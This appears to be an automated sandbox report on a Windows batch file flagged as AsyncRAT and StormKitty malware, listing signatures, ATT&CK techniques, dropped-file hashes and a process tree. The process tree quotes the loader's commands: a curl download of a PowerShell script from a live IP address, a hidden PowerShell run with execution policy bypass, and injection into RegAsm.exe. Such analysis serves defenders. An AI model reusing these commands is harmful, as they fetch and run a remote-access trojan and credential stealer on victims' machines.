Overview

overview

10

Static

static

1

7066e4a496...10.bat

windows7-x64

8

7066e4a496...10.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    94s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-01-2025 02:15

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    7066e4a496d83ee1b677ade06c868a432bb4a0dd364b19ee184147a527b11c10.bat

  • Size

    3KB

  • MD5

    bb445d197063475c8d78de4f0825753c

  • SHA1

    158a8e3b278affe7c1185aad67683e4253cf53dd

  • SHA256

    7066e4a496d83ee1b677ade06c868a432bb4a0dd364b19ee184147a527b11c10

  • SHA512

    173cd8a56e2fa6e8db33bc13870f8751473251aa80be2235321e62b0f84961e9fd00a236aec63342d73f262dbc7c2a920951a1a8f41707ca6640e673f21c4307

Score
10/10
asyncratstormkittydiscoveryexecutionratstealer

Malware Config

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • StormKitty

    StormKitty is an open source info stealer written in C#.

    stealerstormkitty
  • StormKitty payload 1 IoCs
  • Stormkitty family
    stormkitty
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Downloads MZ/PE file
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Suspicious use of SetThreadContext 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7066e4a496d83ee1b677ade06c868a432bb4a0dd364b19ee184147a527b11c10.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2404
    • C:\Windows\system32\cmd.exe
      cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/vfrcxq.ps1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3196
      • C:\Windows\system32\curl.exe
        curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/vfrcxq.ps1
        3⤵
          PID:3036
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -"
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1500
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a3ub5cz4\a3ub5cz4.cmdline"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1280
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB527.tmp" "c:\Users\Admin\AppData\Local\Temp\a3ub5cz4\CSCC619E4DEBF4A4EDF9B3CCA18F0E39A6B.TMP"
            4⤵
              PID:4552
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            3⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:4088

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\RESB527.tmp
        Filesize

        1KB

        MD5

        4b32ca8b61665cd70a053c973bf783af

        SHA1

        68012b78694512c30dd6d85ba34f59bf7971aeb3

        SHA256

        b0148834b8820bf213eae762161b55a7694d15d81b02fbb7ab9abf1f0c7f4eb3

        SHA512

        34cf3531e53e8c1dde9130351c978388be00d8fd64688b5e1d9799ab3e91ea8f65f15429cd65d9fdc6b0f42477d872a77856320219e78c9935dd6d6712365f10

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vp2jocr3.rak.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\a3ub5cz4\a3ub5cz4.dll
        Filesize

        9KB

        MD5

        15a48094d6d460307cc6510b496286e4

        SHA1

        c86b6519124d4b5a305fb52f9191c29155e5bc88

        SHA256

        260f680d88277b34b3eb25654b08e99ef184774b6623df1bcbdde6a21d9af2b2

        SHA512

        668b771bf768a44a5fdb7e021a477e8a3813fa37a7dc2414445b23b4395461c243f2f7cf13a64cf5c8478e0bbd3199842f1aa8b73d7fc25fe4fd91d1b9dc8f4c

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\a3ub5cz4\CSCC619E4DEBF4A4EDF9B3CCA18F0E39A6B.TMP
        Filesize

        652B

        MD5

        f7533e6a935fe4c008d0d30429babc96

        SHA1

        7920c17fae2bb0660610712c8b5ff4c00d8e3fe8

        SHA256

        3720eb550ba39c6049ea414db81e4591adea3ddf90e955fb21ed5671ff522f93

        SHA512

        85f0c57bfd3739e68c10d4ca93752b78f7eb06f7571f62866a66fdd4673c2f35dc574dee7866e4d5b809479570f568044ebaa1e317848ca2f3b40768d0bc424d

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\a3ub5cz4\a3ub5cz4.0.cs
        Filesize

        10KB

        MD5

        b5c3a2d03ff4c721192716f326c77dea

        SHA1

        6b754fd988ca58865674b711aba76d3c6b2c5693

        SHA256

        ab42fe5fd08cb87663e130f99f96124fdd37d825d081b9712b0bad8b6f270fac

        SHA512

        d32e5a98c12b6b85d1913555ea54f837cd0fc647ca945aef9d75ffade06506be1f4a2348827f11c4eeae0796e4156c8f352e3c0f9a6e2cdc93cb501bcdf2c248

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\a3ub5cz4\a3ub5cz4.cmdline
        Filesize

        204B

        MD5

        fec7a9d857f0749c7bed97414cdab4d2

        SHA1

        8c6e94c96bbcd23d5784505140e17ae2a65c2166

        SHA256

        c14c21095a68facc923be2c57923107ae6b08bea89b802a52fd6d6b0b63203d2

        SHA512

        802fb7a772761ff4049acd4afd9cfa325b73a06cf2c15dd732adacde09893726709686a472e010c375f73b4381f1c411a34ecf7424bcc1b7ca6e6499bc7ec08f

        Download Submit

      • memory/1500-13-0x0000015A7F130000-0x0000015A7F174000-memory.dmp

        Filesize

        272KB

        Download

      • memory/1500-33-0x00007FFFC1E70000-0x00007FFFC2931000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1500-14-0x0000015A7F270000-0x0000015A7F2E6000-memory.dmp

        Filesize

        472KB

        Download

      • memory/1500-0-0x00007FFFC1E73000-0x00007FFFC1E75000-memory.dmp

        Filesize

        8KB

        Download

      • memory/1500-12-0x00007FFFC1E70000-0x00007FFFC2931000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1500-11-0x00007FFFC1E70000-0x00007FFFC2931000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1500-1-0x0000015A67070000-0x0000015A67092000-memory.dmp

        Filesize

        136KB

        Download

      • memory/1500-28-0x0000015A02750000-0x0000015A02758000-memory.dmp

        Filesize

        32KB

        Download

      • memory/1500-15-0x0000015A02740000-0x0000015A02750000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4088-30-0x0000000000400000-0x0000000000704000-memory.dmp

        Filesize

        3.0MB

        Download

      • memory/4088-34-0x0000000005AD0000-0x0000000006074000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/4088-35-0x0000000005990000-0x0000000005A22000-memory.dmp

        Filesize

        584KB

        Download

      • memory/4088-36-0x00000000058F0000-0x00000000058FA000-memory.dmp

        Filesize

        40KB

        Download

      • memory/4088-39-0x0000000006A10000-0x0000000006AAC000-memory.dmp

        Filesize

        624KB

        Download

      • memory/4088-40-0x0000000006500000-0x0000000006566000-memory.dmp

        Filesize

        408KB

        Download

      • memory/4088-41-0x0000000006DC0000-0x0000000006DE2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/4088-42-0x0000000006DF0000-0x0000000007144000-memory.dmp

        Filesize

        3.3MB

        Download